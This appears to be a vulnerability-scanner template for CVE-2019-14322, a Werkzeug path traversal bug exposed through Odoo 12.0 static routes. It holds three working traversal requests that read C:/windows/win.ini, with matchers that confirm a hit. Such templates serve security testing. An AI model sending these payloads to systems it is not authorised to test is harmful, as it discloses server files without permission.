id: CVE-2019-14322 info: name: Odoo 12.0 - Local File Inclusion author: madrobot severity: high tags: cve,cve2019,lfi,odoo classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 cve-id: CVE-2019-14322 cwe-id: CWE-22 description: "In Pallets Werkzeug before 0.15.5, SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames." reference: - https://palletsprojects.com/blog/werkzeug-0-15-5-released/ - http://packetstormsecurity.com/files/163398/Pallets-Werkzeug-0.15.4-Path-Traversal.html requests: - method: GET path: - "{{BaseURL}}/base_import/static/c:/windows/win.ini" - "{{BaseURL}}/web/static/c:/windows/win.ini" - "{{BaseURL}}/base/static/c:/windows/win.ini" stop-at-first-match: true matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "bit app support" - "fonts" - "extensions" condition: and part: body